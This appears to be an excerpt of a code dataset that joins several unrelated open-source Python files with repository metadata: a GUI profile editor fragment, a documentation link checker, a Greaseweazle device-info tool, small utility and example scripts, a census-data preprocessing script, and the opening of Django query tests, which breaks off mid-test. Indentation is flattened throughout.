mypage = self.nb.GetCurrentPage()
item = mypage.theName
(pmax, pmin) = mypage.axes.get_ylim()
min_offset = min(mypage.x)
max_offset = max(mypage.x) * 2
if mypage.kind == "CLOUDS":
max_offset = 1
dlg = ComputeDialog(self, -1, "change profile values",
text="enter value for " + item,
pmin0=pmin, pmax0=pmax,
limits_offset=(-min_offset, max_offset))
if (dlg.ShowModal() == wx.ID_OK):
(pmin, pmax, scale, offset) = dlg.GetSelections()
self.write("update values for " + str(item))
self.write("between pmin: %d pmax: %d " % (pmin, pmax))
self.write("between scale: %g offset: %g" % (scale, offset))
mypage.ComputeProfile(pmin, pmax, scale, offset)
self.UpdateAllGraphics()
dlg.Close()
def MenuData(self):
""" define the data for the menu
"""
if self.edit:
return(("&File", # File Menu
("Apply change", "Apply the profile ",
self.OnApplyChange, "applyChange", True, False),
("Save profile", "Save the profile file",
self.OnSaveProfile, "saveProfile", True, False),
("Save profile as", "Save the profile file",
self.OnSaveProfileAs, "saveProfileAs", True, False),
('&Quit', 'Quit', self.OnClose, "quit", True, False)),
("&Edit", # Edit Menu
("Undo", "Undo the last operation",
self.OnUndo, "undo", True, False),
("Redo", "Redo the last operation",
self.OnRedo, "redo", True, False),
("", "", "", "", True, False),
("insert", "mode for add or modify points",
self.OnInsert, "insert", True, True),
("remove", "mode for suppress points",
self.OnRemove, "remove", True, True),
("", "", "", "", True, False),
("change profile values", "chage the profile values",
self.OnChangeProfile, "changProfile", True, False),
("edit x axe", "configure x axe",
self.OnEditXAxe, "edit x axe", True, False),
("", "", "", "", True, False),
("Add gas", "add a gas", self.OnAddgas,
"Add gas", True, False),
("Remove gas", "remove a gas",
self.OnRemovegas, "Remove gas", True, False),
("Add aerosol", "add an aerosol",
self.OnAddAerosol, "Add aerosol", True, False),
("Remove aerosol", "remove an aerosol",
self.OnRemoveAerosol, "Remove aerosol", True, False),
("Add cloud", "add a cloud",
self.OnAddCloud, "Add cloud", True, False),
("Remove cloud", "remove a cloud",
self.OnRemoveCloud, "Remove cloud", True, False),
("Replace Aerosol by clim", "Replace Aerosol by clim",
self.OnReplaceAerosolByClim, "Replace Aerosol by clim",
True, False)),
("&Help", # Help Menu
("About", "About screen", self.OnAbout, "about",
True, False),
("&Help", "Help", self.OnHelp, "help", True, False)))
else:
return(("&File", # File Menu
('&Quit', 'Quit', self.OnQuit, "quit", True, False)),
("&Help", # Help Menu
("About", "About screen", self.OnAbout, "about",
True, False)))
if __name__ == "__main__":
print "version matplotlib :", matplotlib.__version__
p = rmodel.project.Project()
p.openProfile(p.config.ENV["RTTOV_GUI_PREFIX"] +
'/rttov_tests/cldaer101lev_allgas.H5', 1)
ex = wx.App()
myProfileView = ProfileView(None, p.myProfile)
myProfileView.Bind(wx.EVT_MENU, myProfileView.OnApplyChange,
myProfileView.items['applyChange'])
profile = myProfileView.GetProfile()
print "P"
print profile['P']
print "T"
print profile["T"]
print "loop"
ex.MainLoop()
| 40.722833 | 79 | 0.532712 |
c488103f0df8c94d2732af26d966a7a3a8c1a71f | 5,628 | py | Python | dev/find_missing_docs_links.py | HaoXiangQI/cortex | 394f369260072609e42833b180c01a0545be6de7 | [
"Apache-2.0"
] | null | null | null | dev/find_missing_docs_links.py | HaoXiangQI/cortex | 394f369260072609e42833b180c01a0545be6de7 | [
"Apache-2.0"
] | null | null | null | dev/find_missing_docs_links.py | HaoXiangQI/cortex | 394f369260072609e42833b180c01a0545be6de7 | [
"Apache-2.0"
] | 1 | 2021-05-25T03:49:14.000Z | 2021-05-25T03:49:14.000Z | # Copyright 2020 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import re
import asyncio
import aiohttp
script_path = os.path.realpath(__file__)
root = os.path.dirname(os.path.dirname(script_path))
docs_root = os.path.join(root, "docs")
skip_http = False
if len(sys.argv) == 2 and sys.argv[1] == "--skip-http":
skip_http = True
def main():
files = get_docs_file_paths()
link_infos = []
for file in files:
link_infos += get_links_from_file(file)
errors = check_links(link_infos)
for error in errors:
print(error)
def get_docs_file_paths():
file_paths = []
for root, dirs, files in os.walk(docs_root):
for file in files:
if file.endswith(".md"):
file_paths.append(os.path.join(root, file))
return file_paths
# link_info is (src_file, line_number, original_link_text, target_file, header)
def get_links_from_file(file):
link_infos = []
n = 1
with open(file) as f:
for line in f:
for link in re.findall(r"\]\((.+?)\)", line):
if link.startswith("http"):
link_infos.append((file, n, link, None, None))
continue
if link.startswith("#"):
link_infos.append((file, n, link, file, link[1:]))
continue
if link.endswith(".md"):
target = os.path.normpath(os.path.join(file, "..", link))
link_infos.append((file, n, link, target, None))
continue
if ".md#" in link:
parts = link.split("#")
if len(parts) == 2:
target = os.path.normpath(os.path.join(file, "..", parts[0]))
link_infos.append((file, n, link, target, parts[1]))
continue
# Unexpected link format, will be handled later
link_infos.append((file, n, link, None, None))
n += 1
return link_infos
def check_links(link_infos):
errors = []
http_link_infos = []
for link_info in link_infos:
src_file, line_num, original_link_text, target_file, header = link_info
if original_link_text.startswith("http"):
http_link_infos.append(link_info)
continue
if not target_file and not header:
errors.append(err_str(src_file, line_num, original_link_text, "unknown link format")),
continue
error = check_local_link(src_file, line_num, original_link_text, target_file, header)
if error:
errors.append(error)
# fail fast if there are local link errors
if len(errors) > 0:
return errors
if not skip_http:
asyncio.get_event_loop().run_until_complete(check_all_http_links(http_link_infos, errors))
return errors
async def check_all_http_links(http_link_infos, errors):
links = set()
async with aiohttp.ClientSession() as session:
tasks = []
for link_info in http_link_infos:
src_file, line_num, link, _, _ = link_info
if link in links:
continue
links.add(link)
tasks.append(
asyncio.ensure_future(check_http_link(session, src_file, line_num, link, errors))
)
await asyncio.gather(*tasks)
async def check_http_link(session, src_file, line_num, link, errors):
num_tries = 1
while True:
try:
async with session.get(link, timeout=5) as resp:
if resp.status != 200:
errors.append(
err_str(src_file, line_num, link, f"http response code {resp.status}")
)
return
except asyncio.TimeoutError:
if num_tries > 2:
errors.append(err_str(src_file, line_num, link, "http timeout"))
return
num_tries += 1
def check_local_link(src_file, line_num, original_link_text, target_file, header):
if not os.path.isfile(target_file):
return err_str(src_file, line_num, original_link_text, "file does not exist")
if header:
found_header = False
with open(target_file) as f:
for line in f:
if not line.startswith("#"):
continue
if header_matches(line, header):
found_header = True
break
if not found_header:
return err_str(src_file, line_num, original_link_text, "header does not exist")
return None
def header_matches(text, header):
text_words = re.findall(r"[a-zA-Z]+", text.lower())
for word in re.findall(r"[a-zA-Z]+", header.lower()):
if word not in text_words:
return False
return True
def err_str(src_file, line_num, original_link_text, reason):
clean_src_file = src_file.split("cortexlabs/cortex/")[-1]
return f"{clean_src_file}:{line_num}: {original_link_text} ({reason})"
if __name__ == "__main__":
main()
| 31.441341 | 98 | 0.598792 |
3235386d341fc79419015b1149ed8c54476ff215 | 3,657 | py | Python | scripts/greaseweazle/tools/info.py | bocke/Greaseweazle | cd1a3ccf53836faaf3a28318a4af02ede9bd1b7b | [
"Unlicense"
] | null | null | null | scripts/greaseweazle/tools/info.py | bocke/Greaseweazle | cd1a3ccf53836faaf3a28318a4af02ede9bd1b7b | [
"Unlicense"
] | null | null | null | scripts/greaseweazle/tools/info.py | bocke/Greaseweazle | cd1a3ccf53836faaf3a28318a4af02ede9bd1b7b | [
"Unlicense"
] | null | null | null | # greaseweazle/tools/info.py
#
# Greaseweazle control script: Displat info about tools, firmware, and drive.
#
# Written & released by Keir Fraser <keir.xen@gmail.com>
#
# This is free and unencumbered software released into the public domain.
# See the file COPYING for more details, or visit <http://unlicense.org>.
description = "Display information about the Greaseweazle setup."
import requests, re
import sys, serial
from greaseweazle.tools import util
from greaseweazle import usb as USB
from greaseweazle import version
model_id = { 1: { 0: 'F1',
1: 'F1 Plus',
2: 'F1 Plus (Unbuffered)' },
4: { 0: 'V4',
1: 'V4 Slim' },
7: { 0: 'F7 v1',
1: 'F7 Plus (Ant Goffart, v1)',
2: 'F7 Lightning',
3: 'F7 v2)',
4: 'F7 Plus (Ant Goffart, v2)',
5: 'F7 Lightning Plus',
6: 'F7 Slim',
7: 'F7 v3 "Thunderbolt"' },
8: { 0: 'Adafruit Floppy Generic' } }
speed_id = { 0: 'Full Speed (12 Mbit/s)',
1: 'High Speed (480 Mbit/s)' }
def print_info_line(name, value, tab=0):
print(''.ljust(tab) + (name + ':').ljust(12-tab) + value)
def latest_firmware():
rsp = requests.get('https://api.github.com/repos/keirf/'
'greaseweazle-firmware/releases/latest', timeout=5)
tag = rsp.json()['tag_name']
r = re.match(r'v(\d+)\.(\d+)', tag)
major, minor = int(r.group(1)), int(r.group(2))
return major, minor
def main(argv):
parser = util.ArgumentParser(usage='%(prog)s [options]')
parser.add_argument("--device", help="device name (COM/serial port)")
parser.add_argument("--bootloader", action="store_true",
help="display bootloader info (F7 only)")
parser.description = description
parser.prog += ' ' + argv[1]
args = parser.parse_args(argv[2:])
print_info_line('Host Tools', 'v%d.%d' % (version.major, version.minor))
print('Device:')
try:
usb = util.usb_open(args.device, mode_check=False)
except serial.SerialException:
print(' Not found')
sys.exit(0)
mode_switched = usb.can_mode_switch and usb.update_mode != args.bootloader
if mode_switched:
usb = util.usb_reopen(usb, args.bootloader)
port = usb.port_info
if port.device:
print_info_line('Port', port.device, tab=2)
try:
model = model_id[usb.hw_model][usb.hw_submodel]
if usb.hw_model != 8:
model = 'Greaseweazle ' + model
except KeyError:
model = 'Unknown (0x%02X%02X)' % (usb.hw_model, usb.hw_submodel)
print_info_line('Model', model, tab=2)
fwver = 'v%d.%d' % (usb.major, usb.minor)
if usb.update_mode:
fwver += ' (Bootloader)'
print_info_line('Firmware', fwver, tab=2)
print_info_line('Serial', port.serial_number if port.serial_number
else 'Unknown', tab=2)
try:
speed = speed_id[usb.usb_speed]
except KeyError:
speed = 'Unknown (0x%02X)' % usb.usb_speed
print_info_line('USB Rate', speed, tab=2)
usb_update_mode, usb_version = usb.update_mode, usb.version
if mode_switched:
usb = util.usb_reopen(usb, not args.bootloader)
if not usb_update_mode:
latest_version = latest_firmware()
if latest_version > usb_version:
print('\n*** New firmware v%d.%d is available' % latest_version)
util.print_update_instructions(usb)
if __name__ == "__main__":
main(sys.argv)
# Local variables:
# python-indent: 4
# End:
| 31.25641 | 78 | 0.596937 |
017718e3902e820e976a74ef906d07e4f46314c1 | 1,075 | py | Python | seqtools/basics.py | jason-weirather/py-seq-tools | f642c2c73ffef2acc83656a78059a476fc734ca1 | [
"Apache-2.0"
] | 1 | 2018-01-08T15:18:22.000Z | 2018-01-08T15:18:22.000Z | seqtools/basics.py | jason-weirather/py-seq-tools | f642c2c73ffef2acc83656a78059a476fc734ca1 | [
"Apache-2.0"
] | 1 | 2017-09-08T15:02:31.000Z | 2017-09-08T15:02:31.000Z | seqtools/basics.py | jason-weirather/py-seq-tools | f642c2c73ffef2acc83656a78059a476fc734ca1 | [
"Apache-2.0"
] | null | null | null | """Put generally useful things here"""
import re, sys
from cStringIO import StringIO
def is_uuid4(instr):
"""A validator to confirm a string is indeed a UUID4
:param instr: input string that may be uuid4
:type instr: String
:return: true if it is in UUID4 format
:rtype: bool
"""
v = instr.strip().replace('-','').lower()
if len(v) != 32: return False
if not re.match('^[0-9a-f]+$',v): return False
if v[12] != '4': return False
if not re.match('[89ab]',v[16]): return False
return True
class Capturing(list):
"""Capture stdout during part of code execution and store it like
with Capturing() as output:
do_stuff_that_goes_to_stdout()
From
http://stackoverflow.com/questions/16571150/how-to-capture-stdout-output-from-a-python-function-call
"""
def __enter__(self):
self._cache = sys.stdout
self._output = StringIO()
sys.stdout = self._output
return self
def __exit__(self,*args):
self.extend(self._output.getvalue().splitlines())
del self._output
sys.stdout = self._cache
| 27.564103 | 103 | 0.668837 |
dcbbedfab5b0f03d02251875e1f27bb766d42f51 | 983 | py | Python | example/example.py | quil-lang/sbcl-librarian | 51df62ea1cda032aeae15b44b1983cd70b4234ee | [
"MIT"
] | 22 | 2021-11-11T23:23:50.000Z | 2022-03-28T05:44:59.000Z | example/example.py | quil-lang/sbcl-librarian | 51df62ea1cda032aeae15b44b1983cd70b4234ee | [
"MIT"
] | 19 | 2021-11-12T03:51:06.000Z | 2022-03-31T20:06:26.000Z | example/example.py | quil-lang/sbcl-librarian | 51df62ea1cda032aeae15b44b1983cd70b4234ee | [
"MIT"
] | 7 | 2021-11-12T02:22:06.000Z | 2022-03-16T13:57:43.000Z | from ctypes import *
import libcalc
import sys
def die(msg):
print(msg)
exit(1)
if __name__ == '__main__':
while True:
print("> ", end='')
try:
s = input()
except EOFError:
sys.exit(0)
expr = libcalc.expr_type()
if (libcalc.calc_parse(s.encode('utf-8'), byref(expr)) != 0):
die("unable to parse expression")
simplified = libcalc.expr_type()
if (len(sys.argv) == 2 and sys.argv[1] == 'remove-zeros'):
libcalc.calc_remove_zeros(expr, byref(simplified))
else:
libcalc.calc_simplify(expr, byref(simplified))
result = c_char_p()
if (libcalc.calc_expression_to_string(simplified, byref(result)) != 0):
die("unable to print expression to string")
print('')
print(result.value.decode('utf-8'))
print('')
libcalc.lisp_release_handle(expr)
libcalc.lisp_release_handle(simplified)
| 25.205128 | 79 | 0.574771 |
bffdae3c81375b829efd636ec763df9e9d471da9 | 1,200 | py | Python | Classification on Adults Dataset/preprocess.py | cxy1997/SJTU-CS245-Data-Science | 882e3ae0b6b5595e34a59cca890ba8388ff2cfd0 | [
"MIT"
] | 1 | 2020-03-04T02:41:25.000Z | 2020-03-04T02:41:25.000Z | Classification on Adults Dataset/preprocess.py | cxy1997/SJTU-CS245-Data-Science | 882e3ae0b6b5595e34a59cca890ba8388ff2cfd0 | [
"MIT"
] | null | null | null | Classification on Adults Dataset/preprocess.py | cxy1997/SJTU-CS245-Data-Science | 882e3ae0b6b5595e34a59cca890ba8388ff2cfd0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import sklearn.preprocessing as preprocessing
NORM = True
# 数据预处理
def encode(df):
result = np.zeros((16281, 108))
idx = 0
for column in df.columns:
if column != '收入':
if df.dtypes[column] == np.object:
tmp = preprocessing.OneHotEncoder(sparse=False).fit_transform(preprocessing.LabelEncoder().fit_transform(df[column]).reshape(-1, 1))
result[:, idx: idx+tmp.shape[1]] = tmp
idx += tmp.shape[1]
else:
result[:, idx:idx+1] = df[column].values.reshape(-1, 1)
idx += 1
return result
# 数据标准化
def normalize(x):
mu = np.mean(x, axis=0)
sigma = np.std(x, axis=0)
sigma[sigma < 1] = 1
return (x - mu) / sigma
headers = ['年龄', '工作类别', '最终权重', '教育程度', '受教育时间', '婚姻状况', '职业', '家庭关系', '种族', '性别', '资本收益', '资本亏损', '每周工作小时数', '祖国', '收入']
df = pd.read_csv('adult.txt', names = headers)
result = encode(df)
if NORM:
result = normalize(result)
np.save('adult_data.npy', result)
np.save('adult_label.npy', df['收入'].values.reshape(-1)) | 31.578947 | 149 | 0.5675 |
ca982b9c6a32fd7bfa8520cddd7d854983e6dc8c | 168,365 | py | Python | tests/queries/tests.py | Mr-Destructive/django | d3a64bea51676fcf8a0ae593cf7b103939e12c87 | [
"BSD-3-Clause",
"0BSD"
] | 5 | 2021-11-08T13:23:05.000Z | 2022-01-08T09:14:23.000Z | tests/queries/tests.py | Mr-Destructive/django | d3a64bea51676fcf8a0ae593cf7b103939e12c87 | [
"BSD-3-Clause",
"0BSD"
] | 3 | 2020-01-21T17:58:28.000Z | 2022-03-30T14:16:15.000Z | tests/queries/tests.py | Mr-Destructive/django | d3a64bea51676fcf8a0ae593cf7b103939e12c87 | [
"BSD-3-Clause",
"0BSD"
] | 1 | 2021-04-15T01:05:57.000Z | 2021-04-15T01:05:57.000Z | import datetime
import pickle
import sys
import unittest
from operator import attrgetter
from threading import Lock
from django.core.exceptions import EmptyResultSet, FieldError
from django.db import DEFAULT_DB_ALIAS, connection
from django.db.models import Count, Exists, F, Max, OuterRef, Q
from django.db.models.expressions import RawSQL
from django.db.models.sql.constants import LOUTER
from django.db.models.sql.where import NothingNode, WhereNode
from django.test import SimpleTestCase, TestCase, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from .models import (
FK1, Annotation, Article, Author, BaseA, Book, CategoryItem,
CategoryRelationship, Celebrity, Channel, Chapter, Child, ChildObjectA,
Classroom, CommonMixedCaseForeignKeys, Company, Cover, CustomPk,
CustomPkTag, DateTimePK, Detail, DumbCategory, Eaten, Employment,
ExtraInfo, Fan, Food, Identifier, Individual, Item, Job,
JobResponsibilities, Join, LeafA, LeafB, LoopX, LoopZ, ManagedModel,
Member, MixedCaseDbColumnCategoryItem, MixedCaseFieldCategoryItem, ModelA,
ModelB, ModelC, ModelD, MyObject, NamedCategory, Node, Note, NullableName,
Number, ObjectA, ObjectB, ObjectC, OneToOneCategory, Order, OrderItem,
Page, Paragraph, Person, Plaything, PointerA, Program, ProxyCategory,
ProxyObjectA, ProxyObjectB, Ranking, Related, RelatedIndividual,
RelatedObject, Report, ReportComment, ReservedName, Responsibility, School,
SharedConnection, SimpleCategory, SingleObject, SpecialCategory, Staff,
StaffUser, Student, Tag, Task, Teacher, Ticket21203Child,
Ticket21203Parent, Ticket23605A, Ticket23605B, Ticket23605C, TvChef, Valid,
X,
)
class Queries1Tests(TestCase):
@classmethod
def setUpTestData(cls):
cls.nc1 = generic = NamedCategory.objects.create(name="Generic")
cls.t1 = Tag.objects.create(name='t1', category=generic)
cls.t2 = Tag.objects.create(name='t2', parent=cls.t1, category=generic)
cls.t3 = Tag.objects.create(name='t3', parent=cls.t1)
cls.t4 = Tag.objects.create(name='t4', parent=cls.t3)
cls.t5 = Tag.objects.create(name='t5', parent=cls.t3)
cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
cls.n2 = Note.objects.create(note='n2', misc='bar', id=2)
cls.n3 = Note.objects.create(note='n3', misc='foo', id=3, negate=False)
cls.ann1 = Annotation.objects.create(name='a1', tag=cls.t1)
cls.ann1.notes.add(cls.n1)
ann2 = Annotation.objects.create(name='a2', tag=cls.t4)
ann2.notes.add(cls.n2, cls.n3)
# Create these out of order so that sorting by 'id' will be different to sorting
# by 'info'. Helps detect some problems later.
cls.e2 = ExtraInfo.objects.create(info='e2', note=cls.n2, value=41, filterable=False)
e1 = ExtraInfo.objects.create(info='e1', note=cls.n1, value=42)
cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
cls.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
cls.a3 = Author.objects.create(name='a3', num=3003, extra=cls.e2)
cls.a4 = Author.objects.create(name='a4', num=4004, extra=cls.e2)
cls.time1 = datetime.datetime(2007, 12, 19, 22, 25, 0)
cls.time2 = datetime.datetime(2007, 12, 19, 21, 0, 0)
time3 = datetime.datetime(2007, 12, 20, 22, 25, 0)
time4 = datetime.datetime(2007, 12, 20, 21, 0, 0)
cls.i1 = Item.objects.create(name='one', created=cls.time1, modified=cls.time1, creator=cls.a1, note=cls.n3)
cls.i1.tags.set([cls.t1, cls.t2])
cls.i2 = Item.objects.create(name='two', created=cls.time2, creator=cls.a2, note=cls.n2)
cls.i2.tags.set([cls.t1, cls.t3])
cls.i3 = Item.objects.create(name='three', created=time3, creator=cls.a2, note=cls.n3)
cls.i4 = Item.objects.create(name='four', created=time4, creator=cls.a4, note=cls.n3)
cls.i4.tags.set([cls.t4])
cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
cls.r2 = Report.objects.create(name='r2', creator=cls.a3)
cls.r3 = Report.objects.create(name='r3')
# Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the Meta.ordering
# will be rank3, rank2, rank1.
cls.rank1 = Ranking.objects.create(rank=2, author=cls.a2)
cls.c1 = Cover.objects.create(title="first", item=cls.i4)
cls.c2 = Cover.objects.create(title="second", item=cls.i2)
def test_subquery_condition(self):
qs1 = Tag.objects.filter(pk__lte=0)
qs2 = Tag.objects.filter(parent__in=qs1)
qs3 = Tag.objects.filter(parent__in=qs2)
self.assertEqual(qs3.query.subq_aliases, {'T', 'U', 'V'})
self.assertIn('v0', str(qs3.query).lower())
qs4 = qs3.filter(parent__in=qs1)
self.assertEqual(qs4.query.subq_aliases, {'T', 'U', 'V'})
# It is possible to reuse U for the second subquery, no need to use W.
self.assertNotIn('w0', str(qs4.query).lower())
# So, 'U0."id"' is referenced in SELECT and WHERE twice.
self.assertEqual(str(qs4.query).lower().count('u0.'), 4)
def test_ticket1050(self):
self.assertSequenceEqual(
Item.objects.filter(tags__isnull=True),
[self.i3],
)
self.assertSequenceEqual(
Item.objects.filter(tags__id__isnull=True),
[self.i3],
)
def test_ticket1801(self):
self.assertSequenceEqual(
Author.objects.filter(item=self.i2),
[self.a2],
)
self.assertSequenceEqual(
Author.objects.filter(item=self.i3),
[self.a2],
)
self.assertSequenceEqual(
Author.objects.filter(item=self.i2) & Author.objects.filter(item=self.i3),
[self.a2],
)
def test_ticket2306(self):
# Checking that no join types are "left outer" joins.
query = Item.objects.filter(tags=self.t2).query
self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1)).order_by('name'),
[self.i1, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1)).filter(Q(tags=self.t2)),
[self.i1],
)
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1)).filter(Q(creator__name='fred') | Q(tags=self.t2)),
[self.i1],
)
# Each filter call is processed "at once" against a single table, so this is
# different from the previous example as it tries to find tags that are two
# things at once (rather than two tags).
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1) & Q(tags=self.t2)),
[]
)
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1), Q(creator__name='fred') | Q(tags=self.t2)),
[]
)
qs = Author.objects.filter(ranking__rank=2, ranking__id=self.rank1.id)
self.assertSequenceEqual(list(qs), [self.a2])
self.assertEqual(2, qs.query.count_active_tables(), 2)
qs = Author.objects.filter(ranking__rank=2).filter(ranking__id=self.rank1.id)
self.assertEqual(qs.query.count_active_tables(), 3)
def test_ticket4464(self):
self.assertSequenceEqual(
Item.objects.filter(tags=self.t1).filter(tags=self.t2),
[self.i1],
)
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name'),
[self.i1, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).filter(tags=self.t3),
[self.i2],
)
# Make sure .distinct() works with slicing (this was broken in Oracle).
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).order_by('name')[:3],
[self.i1, self.i1, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name')[:3],
[self.i1, self.i2],
)
def test_tickets_2080_3592(self):
self.assertSequenceEqual(
Author.objects.filter(item__name='one') | Author.objects.filter(name='a3'),
[self.a1, self.a3],
)
self.assertSequenceEqual(
Author.objects.filter(Q(item__name='one') | Q(name='a3')),
[self.a1, self.a3],
)
self.assertSequenceEqual(
Author.objects.filter(Q(name='a3') | Q(item__name='one')),
[self.a1, self.a3],
)
self.assertSequenceEqual(
Author.objects.filter(Q(item__name='three') | Q(report__name='r3')),
[self.a2],
)
def test_ticket6074(self):
# Merging two empty result sets shouldn't leave a queryset with no constraints
# (which would match everything).
self.assertSequenceEqual(Author.objects.filter(Q(id__in=[])), [])
self.assertSequenceEqual(
Author.objects.filter(Q(id__in=[]) | Q(id__in=[])),
[]
)
def test_tickets_1878_2939(self):
self.assertEqual(Item.objects.values('creator').distinct().count(), 3)
# Create something with a duplicate 'name' so that we can test multi-column
# cases (which require some tricky SQL transformations under the covers).
xx = Item(name='four', created=self.time1, creator=self.a2, note=self.n1)
xx.save()
self.assertEqual(
Item.objects.exclude(name='two').values('creator', 'name').distinct().count(),
4
)
self.assertEqual(
(
Item.objects
.exclude(name='two')
.extra(select={'foo': '%s'}, select_params=(1,))
.values('creator', 'name', 'foo')
.distinct()
.count()
),
4
)
self.assertEqual(
(
Item.objects
.exclude(name='two')
.extra(select={'foo': '%s'}, select_params=(1,))
.values('creator', 'name')
.distinct()
.count()
),
4
)
xx.delete()
def test_ticket7323(self):
self.assertEqual(Item.objects.values('creator', 'name').count(), 4)
def test_ticket2253(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
self.assertSequenceEqual(q1, [self.i4, self.i1, self.i3, self.i2])
self.assertSequenceEqual(q2, [self.i1])
self.assertSequenceEqual(
(q1 | q2).order_by('name'),
[self.i4, self.i1, self.i3, self.i2],
)
self.assertSequenceEqual((q1 & q2).order_by('name'), [self.i1])
q1 = Item.objects.filter(tags=self.t1)
q2 = Item.objects.filter(note=self.n3, tags=self.t2)
q3 = Item.objects.filter(creator=self.a4)
self.assertSequenceEqual(
((q1 & q2) | q3).order_by('name'),
[self.i4, self.i1],
)
def test_order_by_tables(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
list(q2)
combined_query = (q1 & q2).order_by('name').query
self.assertEqual(len([
t for t in combined_query.alias_map if combined_query.alias_refcount[t]
]), 1)
def test_order_by_join_unref(self):
"""
This test is related to the above one, testing that there aren't
old JOINs in the query.
"""
qs = Celebrity.objects.order_by('greatest_fan__fan_of')
self.assertIn('OUTER JOIN', str(qs.query))
qs = qs.order_by('id')
self.assertNotIn('OUTER JOIN', str(qs.query))
def test_get_clears_ordering(self):
"""
get() should clear ordering for optimization purposes.
"""
with CaptureQueriesContext(connection) as captured_queries:
Author.objects.order_by('name').get(pk=self.a1.pk)
self.assertNotIn('order by', captured_queries[0]['sql'].lower())
def test_tickets_4088_4306(self):
self.assertSequenceEqual(Report.objects.filter(creator=1001), [self.r1])
self.assertSequenceEqual(
Report.objects.filter(creator__num=1001),
[self.r1]
)
self.assertSequenceEqual(Report.objects.filter(creator__id=1001), [])
self.assertSequenceEqual(
Report.objects.filter(creator__id=self.a1.id),
[self.r1]
)
self.assertSequenceEqual(
Report.objects.filter(creator__name='a1'),
[self.r1]
)
def test_ticket4510(self):
self.assertSequenceEqual(
Author.objects.filter(report__name='r1'),
[self.a1],
)
def test_ticket7378(self):
self.assertSequenceEqual(self.a1.report_set.all(), [self.r1])
def test_tickets_5324_6704(self):
self.assertSequenceEqual(
Item.objects.filter(tags__name='t4'),
[self.i4],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t4').order_by('name').distinct(),
[self.i1, self.i3, self.i2],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t4').order_by('name').distinct().reverse(),
[self.i2, self.i3, self.i1],
)
self.assertSequenceEqual(
Author.objects.exclude(item__name='one').distinct().order_by('name'),
[self.a2, self.a3, self.a4],
)
# Excluding across a m2m relation when there is more than one related
# object associated was problematic.
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t1').order_by('name'),
[self.i4, self.i3],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t1').exclude(tags__name='t4'),
[self.i3],
)
# Excluding from a relation that cannot be NULL should not use outer joins.
query = Item.objects.exclude(creator__in=[self.a1, self.a2]).query
self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
# Similarly, when one of the joins cannot possibly, ever, involve NULL
# values (Author -> ExtraInfo, in the following), it should never be
# promoted to a left outer join. So the following query should only
# involve one "left outer" join (Author -> Item is 0-to-many).
qs = Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3))
self.assertEqual(
len([
x for x in qs.query.alias_map.values()
if x.join_type == LOUTER and qs.query.alias_refcount[x.table_alias]
]),
1
)
# The previous changes shouldn't affect nullable foreign key joins.
self.assertSequenceEqual(
Tag.objects.filter(parent__isnull=True).order_by('name'),
[self.t1]
)
self.assertSequenceEqual(
Tag.objects.exclude(parent__isnull=True).order_by('name'),
[self.t2, self.t3, self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.exclude(Q(parent__name='t1') | Q(parent__isnull=True)).order_by('name'),
[self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.exclude(Q(parent__isnull=True) | Q(parent__name='t1')).order_by('name'),
[self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.exclude(Q(parent__parent__isnull=True)).order_by('name'),
[self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.filter(~Q(parent__parent__isnull=True)).order_by('name'),
[self.t4, self.t5],
)
def test_ticket2091(self):
t = Tag.objects.get(name='t4')
self.assertSequenceEqual(Item.objects.filter(tags__in=[t]), [self.i4])
def test_avoid_infinite_loop_on_too_many_subqueries(self):
x = Tag.objects.filter(pk=1)
local_recursion_limit = sys.getrecursionlimit() // 16
msg = 'Maximum recursion depth exceeded: too many subqueries.'
with self.assertRaisesMessage(RecursionError, msg):
for i in range(local_recursion_limit + 2):
x = Tag.objects.filter(pk__in=x)
def test_reasonable_number_of_subq_aliases(self):
x = Tag.objects.filter(pk=1)
for _ in range(20):
x = Tag.objects.filter(pk__in=x)
self.assertEqual(
x.query.subq_aliases, {
'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD',
'AE', 'AF', 'AG', 'AH', 'AI', 'AJ', 'AK', 'AL', 'AM', 'AN',
}
)
def test_heterogeneous_qs_combination(self):
# Combining querysets built on different models should behave in a well-defined
# fashion. We raise an error.
msg = 'Cannot combine queries on two different base models.'
with self.assertRaisesMessage(TypeError, msg):
